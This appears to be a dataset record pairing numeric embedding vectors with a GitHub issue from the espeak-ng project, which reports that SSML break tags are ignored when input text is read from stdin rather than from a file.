0.007583979982882738, 0.00400663074105978, 0.011045491322875023, -0.001249516848474741, -0.02234991453588009, -0.012626338750123978, 0.01273536216467619, -0.016871459782123566, -0.011570168659090996, -0.028673304244875908, 0.049115296453237534, 0.009818971157073975, 0.028046416118741035, -0.01869761012494564, -0.012585454620420933, 0.006749264895915985, -0.008769615553319454, -0.012455988675355911, 0.010323206894099712, -0.005887294188141823, -0.0011387894628569484, 0.004033886827528477, -0.01068434864282608, 0.013273668475449085, 0.02457127720117569, -0.00902173388749361, 0.0013568373396992683, 0.0030356361530721188, -0.0062211803160607815, -0.008837755769491196, 0.0449451319873333, -0.00757035193964839, 0.05620185658335686, 0.016912342980504036, 0.00594862038269639, -0.005798712372779846, -0.024312345311045647, -0.005226336419582367, 0.0039180489256978035, -0.0021668514236807823, 0.006490333005785942, 0.002795442705973983, -0.014636468142271042, 0.006783335004001856, 0.005362616386264563, -0.03019963949918747, -0.006572101265192032, 0.0013662065612152219, -0.009328363463282585, 0.003342265961691737, -0.000514030980411917, 0.0006498850416392088, -0.0037545128725469112, 0.018384166061878204, -0.029654519632458687, 0.008265379816293716, 0.005706723313778639, 0.0038056180346757174, 0.010350462980568409, -0.015535915270447731, -0.022336285561323166, 0.011992637068033218, -0.018234258517622948, 0.013164644129574299, -0.009914367459714413, -0.016367223113775253, 0.002326980233192444, 0.01684420369565487, 0.008101843297481537, -0.0071001858450472355, 0.00513434736058116, 0.011795030906796455, -0.005972469225525856, 0.011938124895095825, 0.0015936237759888172, -0.014949912205338478, 0.009907552972435951, 0.010575325228273869, -0.0056147342547774315, -0.0070388601161539555, -0.005475047510117292, -0.01775727979838848, -0.0340154767036438, 0.012858014553785324, -0.004527901764959097, 0.015999266877770424, -0.001965838484466076, 0.0021140428725630045, -0.015031679533421993, -0.03077201545238495, -0.01787993125617504, 0.00873554591089487, 0.007154698017984629, 0.008449357934296131, 0.008721917867660522, -0.0028908387757837772, 0.009376061148941517, 0.001913029933348298, -0.004827717784792185, -0.012081218883395195, -0.020905345678329468, 0.020728182047605515, -0.01717127487063408, -0.006081493105739355, 0.010118787176907063, -0.01779816299676895, -0.0000678205760777928, -0.0331977978348732, -0.004725507460534573, 0.019283615052700043, -0.0018482969608157873, -0.01574033498764038, -0.024966489523649216, 0.003023711731657386, 0.00024807211593724787, -0.005934992339462042, -0.01865672692656517, -0.01027550920844078, -0.014745491556823254, 0.002037385478615761, 0.03341584652662277, 0.009376061148941517, 0.00893315114080906, 0.0036557100247591734, 0.007754329591989517, 0.0028823211323469877, 0.013484901748597622, -0.012694478034973145, -0.022527078166604042, 0.010404975153505802, 0.019569803029298782, 0.007856539450585842, 0.01160423830151558, -0.00411906186491251, 0.004831124562770128, -0.006176889408379793, 0.004044108092784882, 0.007522653788328171, -0.0017188310157507658, -0.0035773490089923143, 0.006650462280958891, -0.0009607737301848829, -0.008565195836126804, 0.0011575279058888555, 0.002885728143155575, -0.004268969874829054, -0.008244937285780907, 0.017103135585784912, -0.022077353671193123, 0.000720154435839504, -0.012973852455615997, 0.0036625240463763475, -0.00357053498737514, 0.03273444622755051, -0.0010442452039569616, -0.010575325228273869, 0.014200371690094471, 0.00763167766854167, -0.010302765294909477, -0.01020736899226904, -0.008122285827994347, -0.011508842930197716, 0.015004423446953297, -0.014350280165672302, 0.0008244937635026872, -0.00985985528677702, 0.011031863279640675, -0.014350280165672302, -0.00237808539532125, -0.006217773072421551, 0.0027068606577813625, 0.013716578483581543, -0.027474040165543556, -0.004950369708240032, 0.0005208450020290911, -0.03172597661614418, -0.00571013055741787, 0.014759119600057602, -0.017607370391488075, -0.009723574854433537, 0.021504977717995644, -0.001699240761809051, -0.022663356736302376, -0.02202284149825573, 0.007277349941432476, 0.0016600602539256215, -0.00623480835929513, 0.02469392865896225, 0.009927995502948761, -0.0018585179932415485, 0.011822286993265152, -0.009437386877834797, 0.02371271327137947, 0.004974218551069498, -0.02059190161526203, -0.015018051490187645, 0.008912709541618824, 0.0035160230472683907, 0.01428213994950056, -0.009662249125540257, -0.01996501348912716, 0.006582322064787149, -0.008135913871228695, 0.015358751639723778, -0.012810315936803818, 0.019937759265303612, 0.0021992179099470377, 0.003473435528576374, 0.0029283156618475914, 0.013791532255709171, 0.0038839788176119328, 0.0028635826893150806, -0.015399635769426823, 0.002618278842419386, -0.017348438501358032, 0.008721917867660522, -0.0014658613363280892, -0.006425600033253431, -0.002752855187281966, -0.0013934626476839185, -0.001981169916689396, 0.004933334421366453, -0.017634626477956772, 0.002877210732549429, 0.022622473537921906, -0.006657276302576065, -0.003819245845079422, 0.02383536472916603, 0.00178526749368757, -0.006129191257059574, -0.03491492569446564, -0.026152124628424644, -0.013900555670261383, -0.017948070541024208, 0.020237574353814125, -0.012517314404249191, -0.029518239200115204, -0.002780111273750663, -0.006592543330043554, -0.023903505876660347, -0.0019045124063268304, 0.005560222547501326, -0.011938124895095825, 0.014104976318776608, 0.018179746344685555, 0.010929652489721775, -0.012128916569054127, 0.016135547310113907, -0.007393187843263149, 0.011106817051768303, -0.005982690490782261, 0.009560039266943932, -0.001691575045697391, -0.023317500948905945, 0.012203870341181755, -0.005624955520033836, 0.01428213994950056, 0.037040892988443375, -0.0014845997793599963, -0.001669429475441575, -0.0007789251394569874, -0.0036897799000144005, 0.006197331473231316, 0.005243371706455946, 0.007842911407351494, -0.008258565329015255, 0.00467440253123641, -0.011808658950030804, 0.0002580801665317267, -0.008313077501952648, 0.02567514404654503, 0.01804346777498722, 0.019324498251080513, 0.029027631506323814, 0.025007372722029686, -0.004752763547003269, 0.014513815753161907, 0.007440885994583368, -0.013096503913402557, 0.013253225944936275, 0.002599540166556835, 0.012415104545652866, 0.006088307127356529, 0.021395953372120857, -0.010711604729294777, 0.03908509388566017, 0.0020152400247752666, 0.027092456817626953, 0.00963499303907156, -0.016462618485093117, 0.012408290058374405, 0.007474956102669239, -0.0030867410823702812, -0.014459303580224514, 0.0017171275103464723, 0.010439044795930386, -0.0014684165362268686, -0.009158013388514519, -0.0006328500458039343, 0.015290611423552036, 0.028537023812532425, 0.0017733429558575153, -0.013995951972901821, -0.026574593037366867, 0.01753923110663891, 0.003478545928373933, -0.02477569691836834, -0.012960224412381649, -0.00626547122374177, 0.007536281831562519, 0.0006566990632563829, -0.009335177019238472, 0.015808476135134697, -0.021709397435188293, -0.021723026409745216, 0.004861787427216768, 0.009587295353412628, 0.0044359127059578896, -0.013614368624985218, 0.006667497102171183, 0.005093463696539402, -0.011018235236406326, -0.00934880506247282, -0.006800370290875435, -0.00027617986779659986, 0.003897606860846281, -0.0026983432471752167, -0.016667040064930916, 0.005417128559201956, -0.010956908576190472, 0.0017954885261133313, -0.0028823211323469877, 0.003492173971608281, 0.008755987510085106, 0.004984439816325903, -0.007842911407351494, -0.019092822447419167, 0.011413446627557278, -0.0014939691172912717, 0.00542394258081913, -0.03208030387759209, 0.00426215585321188, -0.01910645142197609, 0.025443468242883682, -0.0013934626476839185, 0.013069248758256435, -0.013491716235876083, -0.005604513455182314, -0.028700560331344604, -0.0037238500081002712, 0.0046880305744707584, 0.017280299216508865, 0.007543095853179693, 0.02046925015747547, -0.004739135503768921, 0.0005638583679683506, 0.0009735499625094235, 0.0018431864446029067, 0.021504977717995644, 0.005928178317844868, 0.023058569058775902, -0.006735637318342924, 0.001402831869199872, 0.012646780349314213, 0.021341441199183464, -0.013716578483581543, -0.014104976318776608, -0.0050559863448143005, 0.005512524396181107, 0.019501661881804466, -0.012864828109741211, -0.015685822814702988, -0.004170166794210672, 0.0015595537843182683, 0.004139503929764032, 0.0034257376100867987, -0.006786742247641087, -0.002216252963989973, -0.0013082876102998853, 0.016176432371139526, 0.007999633438885212, -0.007999633438885212, 0.011147701181471348, 0.013409947976469994, 0.013334994204342365, 0.008967221714556217, -0.02938196063041687, 0.01816611923277378, -0.01717127487063408, 0.011413446627557278, -0.007883795537054539, 0.008674219250679016, -0.01210166048258543, -0.009887111373245716, 0.00957366731017828, 0.013764276169240475, -0.0043745869770646095, -0.0004880526103079319, 0.0198423620313406, -0.0016515427269041538, -0.01189724076539278, 0.0014828963903710246, -0.0007870167610235512, 0.02563426084816456, -0.012646780349314213, 0.02642468363046646, 0.006044016219675541, -0.00046803648001514375, 0.003495580982416868, 0.014227627776563168, -0.007338676135987043, -0.02021031826734543, -0.016380852088332176, 0.020700925961136818, -0.0018448899500072002, -0.004122468642890453, 0.01828877069056034, -0.04944236949086189, -0.020700925961136818, -0.0024325973354279995, 0.0011915978975594044, 0.000343255145708099, 0.004241713788360357, 0.00153826002497226, 0.007815656252205372, -0.00860607996582985, 0.013757461681962013, 0.005941806361079216, -0.009744017384946346, 0.023848993703722954, -0.009669063612818718, 0.00027213405701331794, -0.016053779050707817, -0.006766300182789564, 0.042710140347480774, -0.03406998887658119, 0.022499822080135345, -0.0002068687172140926, -0.008224495686590672, 0.017103135585784912, -0.017103135585784912, 0.004030480049550533, -0.0035841630306094885, 0.0039964099414646626, -0.018425051122903824, -0.0038533159531652927, 0.001909622922539711, 0.008851383812725544, -0.0002585060428828001, 0.01696685515344143, 0.0036488960031419992, 0.005192266311496496, -0.010663907043635845, -0.0054648262448608875, 0.008435729891061783, 0.012190242297947407, 0.018193375319242477, -0.0076589337550103664, -0.004684623796492815, -0.004364365711808205, -0.012796688824892044, -0.0019334719981998205, -0.027841996401548386, -0.0039964099414646626, 0.018643097952008247, -0.03308877348899841, 0.0012614413863047957, 0.004561971873044968, -0.0011805251706391573, 0.012960224412381649, 0.018683983013033867, 0.012871642597019672, -0.009008105844259262, -0.012135730125010014, -0.001890884479507804, 0.029082143679261208, -0.021300558000802994, 0.002206031931564212, 0.006609578151255846, 0.01288527064025402, 0.020660042762756348, 0.006899172905832529, 0.030008846893906593, -0.02979080006480217, 0.005495489574968815, 0.014622840099036694, -0.017743650823831558, -0.001620879746042192, -0.008653777651488781, -0.0010893879225477576, -0.0032162070274353027, -0.00757035193964839, -0.004449540749192238, 0.00423149298876524, -0.008885453455150127, -0.020373854786157608, -0.017825419083237648, 0.0038771647959947586, -0.0202512014657259, 0.0033456729725003242, 0.007815656252205372, 0.01857495866715908, -0.00020889162260573357, 0.03892155736684799, 0.006500554271042347, -0.0077066319063305855, -0.0034052955452352762, -0.0030935551039874554, 0.004660774488002062, -0.014581955969333649, -0.003935083746910095, 0.009260223247110844, 0.014418420381844044, -0.010854698717594147, -0.005188859533518553, -0.009893924929201603, -0.002962385769933462, -0.005239964462816715, -0.0036216399166733027, 0.001766529050655663, -0.017484718933701515, 0.007529467809945345, -0.020891718566417694, 0.024176064878702164, -0.0046164835803210735, 0.016162803396582603, -0.008047332055866718, -0.005982690490782261, 0.01041860319674015, -0.019488034769892693, 0.0062995413318276405, -0.006670904345810413, 0.005856631323695183, 0.012476430274546146, 0.011372562497854233, 0.002280985936522484, -0.012060776352882385, 0.005638583563268185, -0.0029726065695285797, 0.007434071972966194, -0.012374220415949821, -0.012421918101608753, -0.01154972705990076, 0.03976649418473244, 0.009832599200308323, 0.004602855537086725, 0.01281713042408228, -0.007222837768495083, 0.018711239099502563, 0.0028823211323469877, -0.004456354770809412, 0.00007372958498308435, 0.014745491556823254, 0.014268511906266212, 0.00032664602622389793, -0.02153223380446434, 0.019283615052700043, -0.008408473804593086, 0.022867778316140175, 0.0012844386510550976, -0.01857495866715908, -0.010650279000401497, -0.0014113493962213397, 0.014909028075635433, 0.014309396035969257, -0.01019374094903469, 0.012462802231311798, 0.001459047314710915, -0.004504052922129631, 0.031153598800301552, -0.022499822080135345, 0.008088216185569763, 0.006425600033253431, 0.01041860319674015, 0.011379376985132694, 0.019992269575595856, -0.008149541914463043, 0.0074477000162005424, 0.010759303346276283, 0.022908661514520645, -0.011127258650958538, -0.0034274409990757704, -0.009110315702855587, -0.01684420369565487, 0.006446042098104954, 0.026370173320174217, 0.008960407227277756, 0.0005630066152662039, -0.003054374596104026, -0.005532966461032629, 0.02379448153078556, 0.0061189704574644566, -0.008715103380382061, 0.006149633321911097, 0.0031497706659138203, 0.003173619508743286, -0.0022554334718734026, 0.00687191728502512, -0.0047663915902376175, 0.011018235236406326, 0.014690980315208435, 0.008279007859528065, 0.019610686227679253, -0.012994294054806232, -0.014840887859463692, -0.01692597195506096, -0.009866668842732906, -0.013137388043105602, 0.011795030906796455, 0.01696685515344143, 0.012013078667223454, 0.009103501215577126, 0.0216548852622509, -0.0138664860278368, 0.001819337485358119, -0.016326339915394783, 0.0013960178475826979, 0.003129328601062298, 0.03668656572699547, 0.006279099266976118, -0.009014919400215149, 0.006670904345810413, 0.018193375319242477, 0.005744200199842453, -0.005580664612352848, -0.022540705278515816, 0.007413629908114672, -0.007434071972966194, 0.003064595628529787, 0.03494218364357948, 0.02675175666809082, 0.0198423620313406, 0.022418053820729256, -0.017730023711919785, 0.004204236902296543, -0.016408108174800873, -0.0025416212156414986, 0.01647624745965004 ]
null
null
null
null
null
null
null
null
null
[ "espeak-ng", "espeak-ng" ]
Espeak-ng ignores SSML tags when the text is read from stdin (default). Consider this text: ``` This is a sentence. <break time="1234ms" /> This is a 2nd sentence. ``` If read from a file: `espeak-ng -f test -w w.wav`, the break is inserted. If instead the text is read from stdin, i.e. `espeak-ng -w w.wav < test`, no break is inserted.
SSML tags ignored when text is read from stdin
https://api.github.com/repos/espeak-ng/espeak-ng/issues/1918/comments
1
2024-05-18T10:10:53
2024-06-09T07:38:37Z
https://github.com/espeak-ng/espeak-ng/issues/1918
2,303,987,836
1,918
false
This is a GitHub Issue repo:espeak-ng owner:espeak-ng Title : SSML tags ignored when text is read from stdin Issue date: --- start body --- Espeak-ng ignores SSML tags when the text is read from stdin (default). Consider this text: ``` This is a sentence. <break time="1234ms" /> This is a 2nd sentence. ``` If read from a file: `espeak-ng -f test -w w.wav`, the break is inserted. If instead the text is read from stdin, i.e. `espeak-ng -w w.wav < test`, no break is inserted. --- end body ---
503
[ 0.008873161859810352, 0.016247019171714783, -0.01148331630975008, 0.02998610958456993, 0.035138268023729324, -0.0109040392562747, -0.022993894293904305, 0.04029042646288872, -0.030558571219444275, 0.00836885068565607, -0.01920473948121071, 0.05768236890435219, -0.011994443833827972, -0.006808209698647261, -0.01502031460404396, -0.010365652851760387, 0.0017242012545466423, 0.010127127170562744, 0.0003520386235322803, -0.0011483316775411367, -0.01882309839129448, 0.0342114232480526, -0.022734923288226128, 0.015824487432837486, -0.03590155020356178, 0.009615999646484852, -0.021685408428311348, -0.001390265068039298, -0.03478388488292694, -0.013875390402972698, 0.01811433583498001, 0.0019848758820444345, -0.02484758011996746, 0.00433435570448637, 0.01739194244146347, 0.020336033776402473, 0.044079579412937164, 0.03887290135025978, -0.025978874415159225, 0.006508348509669304, -0.011776362545788288, -0.012048963457345963, -0.041217271238565445, -0.012560090981423855, -0.051657889038324356, 0.03268485888838768, -0.03355718031525612, 0.037182774394750595, -0.021835340186953545, 0.02578805387020111, 0.03162171319127083, -0.028677623718976974, -0.0208676066249609, -0.032821159809827805, 0.01236927043646574, -0.008689156733453274, 0.01684674061834812, -0.018577758222818375, -0.043425336480140686, 0.0193819310516119, -0.01811433583498001, 0.010208907537162304, -0.012607796117663383, 0.009561480022966862, -0.01374590490013361, 0.004773925058543682, -0.06498807668685913, -0.008682341314852238, -0.023443685844540596, 0.006838877219706774, -0.003492700168862939, -0.012989437207579613, 0.008934497833251953, 0.023034783080220222, 0.029577206820249557, -0.03290294110774994, 0.033202800899744034, 0.0200498029589653, 0.011122120544314384, -0.017201121896505356, -0.03715551644563675, -0.011905848048627377, -0.038682080805301666, 0.011571912094950676, 0.02131739817559719, 0.00924798846244812, 0.015919897705316544, -0.03467484563589096, -0.04626038670539856, -0.018863989040255547, -0.027341879904270172, 0.03816413879394531, 0.04328903928399086, -0.023498205468058586, -0.013255223631858826, -0.00495452294126153, 0.013650494627654552, 0.0008633784600533545, -0.015606407076120377, -0.004385468550026417, 0.0020053209736943245, -0.039554402232170105, -0.009779560379683971, -0.0028043827041983604, -0.00035012190346606076, 0.03412964567542076, -0.0035199602134525776, -0.048059556633234024, 0.0024431864731013775, 0.10184372961521149, 0.011537836864590645, -0.03020418994128704, -0.013834500685334206, -0.04279835522174835, -0.00004895636811852455, 0.048114076256752014, 0.04135357216000557, -0.0360923707485199, -0.010583733208477497, 0.0008936201338656247, -0.03064035065472126, 0.02202616073191166, -0.0014907866716384888, 0.045851487666368484, -0.009254803881049156, 0.03598333150148392, -0.030231449753046036, -0.058554694056510925, -0.020117953419685364, -0.032603077590465546, -0.01200807373970747, -0.005993814207613468, -0.0012318157823756337, -0.030449530109763145, 0.016519621014595032, -0.008178030140697956, -0.04947708174586296, 0.019790831953287125, -0.009513774886727333, -0.002956016920506954, -0.054520197212696075, 0.0022779221180826426, 0.023947997018694878, -0.005390684586018324, -0.07725512236356735, -0.009036722593009472, -0.026033394038677216, 0.00027089723153039813, -0.004382060840725899, -0.01303032785654068, -0.03399334475398064, -0.058554694056510925, -0.0208676066249609, 0.02356635592877865, -0.009943121112883091, 0.0009268433786928654, 0.006852507591247559, -0.020581373944878578, -0.022107940167188644, 0.0024278524797409773, -0.012362455017864704, -0.03620140999555588, 0.0071353311650455, -0.037400856614112854, -0.023716285824775696, -0.013970800675451756, -0.004129905253648758, 0.035628948360681534, 0.000021030740754213184, 0.023811696097254753, -0.04304369539022446, 0.03810961917042732, -0.011987628415226936, 0.0024278524797409773, -0.023280125111341476, -0.021072056144475937, -0.010440617799758911, 0.022898484021425247, -0.030940212309360504, 0.049722421914339066, -0.03682839497923851, 0.03846399858593941, 0.003366622142493725, -0.020349664613604546, 0.005775733385235071, 0.00019976541807409376, 0.0029304607305675745, 0.006869545206427574, -0.006821839604526758, -0.02224424108862877, -0.012021703645586967, 0.0044672489166259766, -0.03802783787250519, -0.024970250204205513, -0.015551886521279812, 0.010788184590637684, -0.031185554340481758, 0.002654452109709382, 0.006317527964711189, -0.026196954771876335, 0.028732145205140114, 0.02776441164314747, -0.023157455027103424, -0.034320466220378876, -0.018632277846336365, 0.016260650008916855, -0.04582422599196434, 0.04285287484526634, -0.0022847370710223913, -0.0759466364979744, -0.025828944519162178, -0.029468167573213577, 0.017623653635382652, -0.013384709134697914, -0.0029355718288570642, 0.00441613607108593, 0.014884013682603836, 0.026742156594991684, -0.01316662784665823, 0.0032916569616645575, 0.002185919089242816, -0.01093129999935627, 0.0012727058492600918, -0.03333910182118416, -0.035247307270765305, 0.0001544029073556885, -0.022503212094306946, -0.041435349732637405, 0.002538596745580435, 0.031240073963999748, 0.06335247308015823, -0.00458310404792428, 0.01893213950097561, 0.035683467984199524, -0.0024534089025110006, -0.010127127170562744, 0.028077902272343636, 0.006876360159367323, -0.01270320639014244, -0.01518387533724308, 0.03134911507368088, 0.02401614747941494, -0.022435061633586884, -0.012478310614824295, -0.0026578595861792564, 0.00018975583952851593, 0.04527902603149414, -0.02870488353073597, -0.013268853537738323, 0.002978165866807103, -0.02783256210386753, -0.004637624137103558, -0.0012488532811403275, -0.02578805387020111, -0.012117113918066025, 0.015715446323156357, 0.02821420319378376, -0.023266494274139404, -0.00020445074187591672, -0.023934366181492805, 0.03571072965860367, 0.02231239154934883, 0.012362455017864704, 0.02461586892604828, -0.012444235384464264, -0.045796968042850494, 0.002030877396464348, -0.023784436285495758, 0.021876228973269463, -0.016097089275717735, 0.029168305918574333, -0.006412938237190247, -0.010590548627078533, 0.0006921509630046785, -0.06417027115821838, -0.027791671454906464, 0.006927472539246082, -0.004722812213003635, 0.029686247929930687, 0.0074692671187222, -0.05773688852787018, 0.004123089835047722, 0.005840476136654615, 0.011360646225512028, -0.0019065032247453928, 0.0020189511124044657, 0.023266494274139404, -0.002383554819971323, -0.053920477628707886, -0.022285131737589836, 0.015061204321682453, -0.015810856595635414, -0.008068989031016827, 0.0379733182489872, -0.0063379728235304356, 0.036637574434280396, -0.0026919348165392876, -0.019531860947608948, 0.021440068259835243, -0.0178962554782629, -0.009016278199851513, 0.0077963885851204395, 0.025747163221240044, 0.0011483316775411367, -0.030776651576161385, -0.009874970652163029, 0.011081229895353317, 0.03415690362453461, -0.046015046536922455, -0.016642291098833084, 0.03472936525940895, -0.05449293926358223, 0.020935755223035812, -0.005707583390176296, -0.012696390971541405, -0.0044604334980249405, -0.010140757076442242, -0.026851197704672813, 0.0012241487856954336, -0.02649681642651558, -0.006838877219706774, -0.03377526253461838, -0.04759613424539566, 0.0073534115217626095, 0.027573591098189354, -0.004382060840725899, 0.0223532821983099, -0.0032303216867148876, 0.031376373022794724, 0.006699169520288706, 0.012539645656943321, -0.016574140638113022, 0.018727688118815422, -0.024983881041407585, 0.006593536585569382, -0.051875967532396317, -0.018782207742333412, -0.030340490862727165, 0.006767319515347481, -0.03235773742198944, -0.019177479669451714, 0.02015884406864643, 0.0023154045920819044, -0.03791879862546921, 0.04664202779531479, 0.004698959644883871, 0.0015214543091133237, 0.03434772416949272, 0.03731907531619072, -0.017923515290021896, 0.0007666902965866029, 0.022339651361107826, 0.012396530248224735, 0.003410919802263379, -0.01661503128707409, -0.03080391138792038, -0.02115383744239807, -0.04467930272221565, 0.02998610958456993, 0.003434772603213787, 0.02043144404888153, -0.06373411417007446, -0.02441141940653324, 0.0029270532540977, 0.01288721151649952, -0.030831173062324524, -0.0030139447189867496, -0.005475872196257114, 0.03404786437749863, -0.018973028287291527, -0.00919346883893013, 0.020349664613604546, -0.013193887658417225, -0.021181097254157066, -0.011299311183393002, -0.0009225839748978615, -0.01402532123029232, -0.005929071456193924, 0.02671489678323269, 0.01410710159689188, -0.018155226483941078, 0.048713795840740204, 0.020022543147206306, -0.036964695900678635, -0.005421352107077837, 0.0068899900652468204, -0.010706404224038124, 0.04718723148107529, 0.0023477759677916765, 0.0084165558218956, -0.006808209698647261, 0.055228959769010544, -0.025161070749163628, -0.052802812308073044, -0.010508768260478973, 0.026237845420837402, -0.029549947008490562, -0.04053576663136482, 0.029141046106815338, 0.018632277846336365, -0.006777542177587748, -0.03903646022081375, 0.047732435166835785, 0.012907656840980053, -0.007148961070924997, -0.002840161556378007, -0.029522687196731567, -0.03004062920808792, -0.004429765976965427, -0.0025965245440602303, 0.02124924771487713, -0.00175316515378654, -0.0011057377560064197, -0.029740767553448677, 0.005278236698359251, 0.018482347950339317, 0.0032286180648952723, -0.013214332982897758, -0.034702107310295105, 0.007537417579442263, 0.003339362097904086, 0.00751015730202198, 0.0251747015863657, -0.0042082779109478, 0.03197609633207321, 0.007605567574501038, 0.0032183954026550055, 0.013677754439413548, 0.03909098356962204, -0.047350794076919556, -0.025747163221240044, -0.025052031502127647, -0.00783727876842022, 0.009602369740605354, 0.011469686403870583, -0.006688946858048439, -0.01822337694466114, -0.015701817348599434, -0.007060365751385689, -0.03153993561863899, -0.040890149772167206, 0.017132971435785294, 0.010610993951559067, -0.01502031460404396, -0.015279285609722137, 0.008566485717892647, -0.012635055929422379, -0.021835340186953545, 0.029740767553448677, -0.0007824500207789242, -0.026142435148358345, 0.022571362555027008, -0.03173075616359711, -0.02148095890879631, -0.009173023514449596, -0.012955361977219582, 0.00847107544541359, -0.016274278983473778, 0.002882755594328046, 0.03333910182118416, -0.01838693767786026, -0.008402925916016102, 0.007959948852658272, 0.008028099313378334, 0.047732435166835785, -0.02461586892604828, -0.026251476258039474, 0.004436580929905176, 0.021835340186953545, -0.03396608307957649, -0.012791801244020462, 0.0058234385214746, -0.00006916185520822182, 0.0014584152959287167, 0.024029778316617012, 0.03306649997830391, -0.01656050980091095, -0.024861210957169533, 0.013643679209053516, -0.032494038343429565, -0.0038607115857303143, -0.03947262465953827, -0.0017855365294963121, -0.020908495411276817, -0.047841474413871765, -0.017132971435785294, -0.02821420319378376, -0.0069308802485466, -0.016328798606991768, 0.02025425434112549, 0.03715551644563675, 0.06182590499520302, 0.013227962888777256, -0.020226992666721344, -0.005434982478618622, 0.052911851555109024, 0.012526015751063824, -0.027396399527788162, 0.0336662232875824, -0.016151608899235725, 0.0068899900652468204, 0.0012837803224101663, 0.029195565730333328, -0.008375665172934532, 0.006222117692232132, -0.0014328589895740151, -0.011278865858912468, 0.014352441765367985, -0.0077963885851204395, 0.01093129999935627, -0.003935676999390125, -0.06329794973134995, -0.012396530248224735, -0.05149432644248009, 0.004474063869565725, 0.03156719356775284, -0.010140757076442242, 0.005980184301733971, 0.013732274994254112, 0.006181227508932352, -0.02794160135090351, -0.00797357875853777, 0.00944562442600727, 0.03892742097377777, -0.03246677666902542, 0.05533800274133682, 0.03892742097377777, -0.004876150283962488, -0.0063856784254312515, -0.026973867788910866, -0.03020418994128704, -0.019627271220088005, -0.017214752733707428, 0.0662420392036438, -0.008437001146376133, 0.004058347083628178, 0.01159235741943121, -0.0017182381125167012, 0.027082908898591995, 0.02897748537361622, -0.043370816856622696, 0.01065188366919756, -0.04759613424539566, 0.02036329358816147, 0.022489581257104874, 0.025092922151088715, 0.0031144663225859404, 0.009779560379683971, -0.0023579986300319433, 0.013125738129019737, 0.02336190454661846, 0.017637284472584724, 0.007959948852658272, 0.011571912094950676, -0.03620140999555588, -0.017364682629704475, -0.011817253194749355, 0.025651752948760986, 0.0014362664660438895, 0.04323451593518257, -0.02336190454661846, 0.025869833305478096, 0.008675526827573776, -0.0028657179791480303, 0.008028099313378334, -0.007217111065983772, -0.0015640482306480408, -0.02108568698167801, -0.011128935031592846, -0.006504941266030073, 0.0028384579345583916, 0.005063563585281372, 0.039336323738098145, -0.031240073963999748, -0.007455637212842703, 0.048168595880270004, 0.028350502252578735, -0.012117113918066025, 0.0062357475981116295, -0.009656890295445919, 0.010311132296919823, 0.011864958330988884, -0.0360923707485199, -0.006324342917650938, 0.008157584816217422, 0.011694582179188728, -0.0025232629850506783, -0.025052031502127647, -0.030067889019846916, 0.01699667237699032, -0.007087625563144684, 0.03434772416949272, -0.00036375195486471057, 0.0028129015117883682, 0.02064952440559864, -0.014120731502771378, -0.02870488353073597, 0.006419753190129995, 0.03192157670855522, 0.004886372946202755, 0.009595555253326893, 0.06389766931533813, 0.032003358006477356, 0.013521009124815464, -0.031430892646312714, 0.023729916661977768, -0.00787135399878025, -0.0007338929572142661, -0.006927472539246082, 0.020881235599517822, -0.008811826817691326, 0.007005845662206411, 0.04587874561548233, -0.002966239582747221, 0.0007470970740541816, 0.03224869817495346, 0.027805300429463387, 0.011899033561348915, 0.012716836296021938, 0.029386386275291443, 0.013037142343819141, -0.021344657987356186, 0.025651752948760986, -0.00977274589240551, 0.011435611173510551, 0.0035233679227530956, -0.027559960260987282, -0.013125738129019737, 0.008818642236292362, 0.004048124887049198, -0.03887290135025978, 0.0306948721408844, -0.00919346883893013, -0.03993604704737663, -0.018959399312734604, 0.042089592665433884, 0.014434222131967545, 0.006031297147274017, -0.006232340354472399, -0.009138948284089565, -0.013125738129019737, 0.0251747015863657, -0.013009882532060146, 0.011060785502195358, -0.013711829669773579, -0.005206678993999958, -0.0382186584174633, 0.02081308513879776, 0.017037561163306236, 0.0027839376125484705, -0.01904117874801159, 0.020826715975999832, 0.002584598260000348, 0.007966764271259308, -0.00030220375629141927, 0.02242143079638481, -0.007380671799182892, 0.048005033284425735, -0.002634007018059492, -0.005912033841013908, 0.021440068259835243, -0.013193887658417225, 0.00379596883431077, -0.011973998509347439, 0.034456767141819, -0.011531022377312183, -0.02998610958456993, 0.017078451812267303, -0.03213965520262718, 0.00858693104237318, -0.006855914834886789, -0.03064035065472126, 0.028241463005542755, -0.005683730822056532, -0.014979424886405468, -0.013302928768098354, -0.004504731390625238, 0.0030446122400462627, -0.01043380331248045, 0.003068464808166027, -0.00416738772764802, -0.024997510015964508, -0.02754632942378521, 0.004865927621722221, 0.025311002507805824, 0.006593536585569382, -0.014597782865166664, 0.0036732982844114304, -0.001991691067814827, 0.001586197060532868, 0.009949936531484127, -0.01826426573097706, -0.009077613241970539, 0.0007185591966845095, -0.012853136286139488, -0.011640062555670738, 0.026742156594991684, 0.04225315526127815, 0.0034484025090932846, 0.0056564705446362495, -0.0379733182489872, 0.020554114133119583, -0.03549264743924141, -0.013984430581331253, 0.01695578172802925, 0.01728290319442749, 0.00792587362229824, -0.011299311183393002, 0.00462399423122406, 0.018468717113137245, -0.011537836864590645, -0.011006264947354794, -0.0019371707458049059, 0.02865036390721798, 0.008034913800656796, 0.0023477759677916765, 0.007912243716418743, -0.031049253419041634, -0.04598778858780861, 0.012846321798861027, -0.0017702026525512338, 0.0015384918078780174, -0.03699195384979248, -0.031485415995121, 0.02506566047668457, -0.006041519343852997, 0.002073471201583743, 0.008702786639332771, 0.010045346803963184, 0.01739194244146347, -0.018945768475532532, -0.016042567789554596, 0.015211135149002075, 0.007326151710003614, -0.021835340186953545, 0.004641031846404076, -0.029604468494653702, -0.0064572361297905445, 0.04146261140704155, 0.010467877611517906, -0.01065188366919756, 0.0008284514769911766, -0.03999056667089462, -0.01123116072267294, -0.01424340158700943, 0.015919897705316544, 0.004283242858946323, 0.009173023514449596, -0.03456580638885498, -0.017541874200105667, -0.010058976709842682, -0.011871772818267345, 0.024166077375411987, -0.015142984688282013, 0.00853241141885519, 0.007244371343404055, 0.018918508663773537, -0.021671779453754425, 0.039172761142253876, -0.026305995881557465, 0.00771460821852088, 0.006716207135468721, -0.02787345089018345, 0.016424208879470825, 0.015197505243122578, 0.012621426023542881, -0.012151189148426056, -0.015919897705316544, -0.020635895431041718, -0.00379596883431077, 0.01799166575074196, -0.01661503128707409, 0.008477890864014626, -0.008961757645010948, 0.005888181272894144, -0.01876857876777649, -0.013854945078492165, -0.02019973285496235, 0.022925743833184242, -0.032439518719911575, -0.015810856595635414, 0.04031768813729286, -0.03592881187796593, 0.019954392686486244, -0.015974417328834534, 0.004116274882107973, 0.02019973285496235, -0.026960238814353943, -0.008327960036695004, -0.027082908898591995, 